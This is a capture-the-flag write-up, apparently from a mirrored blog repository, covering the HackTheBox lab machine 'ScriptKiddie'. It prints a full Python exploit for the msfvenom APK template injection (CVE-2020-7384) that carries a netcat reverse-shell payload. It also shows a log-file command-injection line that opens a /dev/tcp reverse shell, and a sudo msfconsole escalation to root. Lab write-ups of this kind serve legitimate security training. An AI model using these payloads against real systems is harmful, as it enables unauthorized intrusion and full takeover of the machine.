oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 20:37:01 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
hacking-blogposts/Easy/58.md

396 lines
13 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# ScriptKiddie Writeup
![](img/58.png)
## Introduction :
ScriptKiddie is an easy box released back in Febuary 2021.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ nmap -vvv -p- 10.10.10.226 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 22/tcp on 10.10.10.226
Discovered open port 5000/tcp on 10.10.10.226
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 5000 so let's investigate it:
![](prg/58_001.png)
There were alot of rabbitholes for this box early on, so here's the intended way:
![](prg/58_002.png)
Basically here you see that you are able to upload an android template file, and there is an exploit for it called [CVE2020-7384](https://www.exploit-db.com/exploits/49491):
![](prg/58_003.png)
So let's save it locally:
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ vim exploit.py
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ cat exploit.py
#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode
# Change me
**payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2> &1|nc 10.10.14.13 9001 >/tmp/f'**
# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()
tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"
# Touch empty_file
open(empty_file, "w").close()
# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])
# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
"-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])
# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
"-storepass", storepass, "-keypass", keypass, apk_file, key_alias])
print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
You can use this or we can just use metasploit:
msf6 > search venom apk
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection 2020-10-29 excellent No Rapid7 Metasploit Framework msfvenom APK Template Command Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options
Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.apk yes The APK file name
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.0.10 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Automatic
Let's setup the required options and generate the apk template:
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST tun0
LHOST => tun0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 9002
LPORT => 9002
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
[+] msf.apk stored at /home/nothing/.msf4/local/msf.apk
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exit
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ cp /home/nothing/.msf4/local/msf.apk .
Now let's prepare our netcat to catch the reverse shell on our port 9002, and upload the apk file:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
→ nc -lvnp 9002
listening on [any] 9002 ...
` ![](prg/58_004.png)
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
→ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.226] 36670
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
cat ~/user.txt
1dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there you go! We have a reverse shell as the kid user, and thus we have been able to print the user flag.
## **Part 3 : Getting Root Access**
Now before we enumerate the box let's get a fully interactive TTY shell:
which python python3 wget curl
/usr/bin/python3
/usr/bin/wget
/usr/bin/curl
#spawn a TTY with python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
#background the reverse shell process
kid@scriptkiddie:~/html$ ^Z
[1] + 3083589 suspended nc -lvnp 9002
#set stty raw and foreground the process
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
→ stty raw -echo ; fg
[1] + 3083589 continued nc -lvnp 9002
#export the SHELL and TERM variables
kid@scriptkiddie:~/html$ export SHELL=bash
kid@scriptkiddie:~/html$ export TERM=screen-256color
#set the TTY rows and columns for vi / nano
kid@scriptkiddie:~/html$ stty rows 40 columns 125
kid@scriptkiddie:~/html$ reset
Now that we have a fully interactive TTY shell let's upload linpeas onto the box:
[term1]
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[term2]
kid@scriptkiddie:~/html$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
--2021-06-08 12:04:57-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: /tmp/peas.sh
/tmp/peas.sh 100%[====================================================>] 333.85K 2.03MB/s in 0.2s
2021-06-08 12:04:57 (2.03 MB/s) - /tmp/peas.sh saved [341863/341863]
kid@scriptkiddie:~/html$ chmod +x /tmp/peas.sh
kid@scriptkiddie:~/html$ /tmp/peas.sh
` ![](prg/58_005.png)
Scrolling through the output we see that there is another user on the box named **pwn** :
![](prg/58_006.png)
So let's take a look at his home directory:
kid@scriptkiddie:~/html$ ls -lash /home/pwn
total 44K
4.0K drwxr-xr-x 6 pwn pwn 4.0K Feb 3 12:06 .
4.0K drwxr-xr-x 4 root root 4.0K Feb 3 07:40 ..
0 lrwxrwxrwx 1 root root 9 Feb 3 12:06 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 pwn pwn 220 Feb 25 2020 .bash_logout
4.0K -rw-r--r-- 1 pwn pwn 3.7K Feb 25 2020 .bashrc
4.0K drwx------ 2 pwn pwn 4.0K Jan 28 17:08 .cache
4.0K drwxrwxr-x 3 pwn pwn 4.0K Jan 28 17:24 .local
4.0K -rw-r--r-- 1 pwn pwn 807 Feb 25 2020 .profile
4.0K -rw-rw-r-- 1 pwn pwn 74 Jan 28 16:22 .selected_editor
4.0K drwx------ 2 pwn pwn 4.0K Feb 10 16:10 .ssh
4.0K drwxrw---- 2 pwn pwn 4.0K Feb 3 12:00 recon
4.0K -rwxrwxr-- 1 pwn pwn 250 Jan 28 17:57 scanlosers.sh
kid@scriptkiddie:~/html$ cd /home/pwn
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l <****$log) -gt 0 ]]; then echo -n > $log; fi
Here we see that there is a bashscript that takes a logfile from **/home/kid/logs/hackers** it, gets ip addresses from it and runs nmap against each of them. However the input isn't being sanitized, so let's use it to get a reverse shell:
kid@scriptkiddie:/home/pwn$ echo -n "Z Y 10.10.14.13;/bin/bash -c 'bash >& /dev/tcp/10.10.14.13/9003 0>&1' #" >/home/kid/logs/hackers
And as soon as we run it we have a reverse shell connection:
[ 10.10.14.13/23 ] [ /dev/pts/48 ] [~/HTB/ScriptKiddie]
→ nc -lvnp 9003
listening on [any] 9003 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.226] 53822
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
This time we get access to the pwn user, So let's spawn a fully interactive TTY just like we previously did:
python3 -c 'import pty; pty.spawn("/bin/bash")'
pwn@scriptkiddie:~$ ^Z
[1] + 3150958 suspended nc -lvnp 9003
[ 10.10.14.13/23 ] [ /dev/pts/48 ] [~/HTB/ScriptKiddie]
→ stty raw -echo ; fg
[1] + 3150958 continued nc -lvnp 9003
export TERM=screen-256color
pwn@scriptkiddie:~$ export SHELL=bash
pwn@scriptkiddie:~$ stty rows 40 columns 200
pwn@scriptkiddie:~$ reset
Now we run linpeas once again:
pwn@scriptkiddie:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh ; chmod +x /tmp/peas.sh ; /tmp/peas.sh
This time we see the following:
![](prg/58_007.png)
Apparently the pwn user can run **metasploit** as the root user, so let's do it:
pwn@scriptkiddie:~$ sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.0.9-dev ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Display the Framework log using the log command, learn more with help log
msf6 > bash
[*] exec: bash
root@scriptkiddie:/home/pwn# id
uid=0(root) gid=0(root) groups=0(root)
root@scriptkiddie:/home/pwn# cat /root/root.txt
87XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there you go! We managed to get a root shell and print the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/58_graph.png)
Reference in a new issue View git blame Copy permalink